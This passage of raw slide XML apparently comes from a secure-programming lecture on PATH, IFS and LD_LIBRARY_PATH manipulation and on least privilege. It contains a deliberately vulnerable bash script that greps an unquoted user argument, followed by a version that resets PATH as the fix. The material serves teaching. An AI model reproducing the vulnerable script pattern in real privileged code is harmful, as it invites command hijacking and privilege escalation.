                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>correctly</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33</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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53716" y="883411"/>
            <a:ext cx="4950460" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="916939" y="1909826"/>
            <a:ext cx="7119620" cy="2037080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="58419" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="459"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-155" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or IFS </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variables</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Cause </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to execute attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>program…</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…with privileges granted to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>script</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Almost impossible to prevent in some</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757977" y="4027091"/>
            <a:ext cx="6254115" cy="900430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="31942">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="85090" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/bin/bash</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1855"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user=`echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-45" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'s/@.*$//'`</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>grep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/var/local/accounts/ipaddrs</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1757977" y="5205128"/>
            <a:ext cx="6254115" cy="1370965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="31942">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="106680" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="121285" marR="1544955">
              <a:lnSpc>
                <a:spcPts val="1850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="840"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/bin/bash  PATH=”/sbin:/bin:/usr/sbin:/usr/bin”  export</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>PATH</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1760"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>user=`echo </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$1 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-45" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'s/@.*$//'`</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="121285">
              <a:lnSpc>
                <a:spcPts val="1914"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1650" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>grep </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="-20" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1650" spc="5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/var/local/accounts/ipaddrs</a:t>
            </a:r>
            <a:endParaRPr sz="1650">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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9" name="object 9"/>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34</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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232151" y="1009141"/>
            <a:ext cx="5593080" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-85" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>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5600" algn="l"/>
                <a:tab pos="356235" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>If they invoke other programs, compiled</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>programs  can be vulnerable to </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0"/>
              <a:t>PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>variable</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="105" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must reset to “safe”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>values</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="1019175" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="710"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
                <a:tab pos="356235" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>If dynamically linked, may be vulnerable to  manipulation </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t>LD_LIBRARY_PATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="680"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>locate suitable dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-80" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>library</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>either </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>statically link </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>privileged</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>programs</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="670"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755650" algn="l"/>
                <a:tab pos="756285" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>or prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variable</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35</a:t>
            </a:fld>
            <a:endParaRPr spc="-5"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068066" y="1006855"/>
            <a:ext cx="3921125" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Use of Least</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Privilege</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1955546"/>
            <a:ext cx="7772400" cy="4425950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="64135" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="984885" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="505"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Exploit of flaws may give attacker greater  privileges - privilege escalation</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPts val="3240"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Hence, run programs with least privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>needed  to complete their</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>determine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>suitable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>user and group to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:endParaRPr sz="28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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>whether </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>grant extra user or group</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>privileges</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>latter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
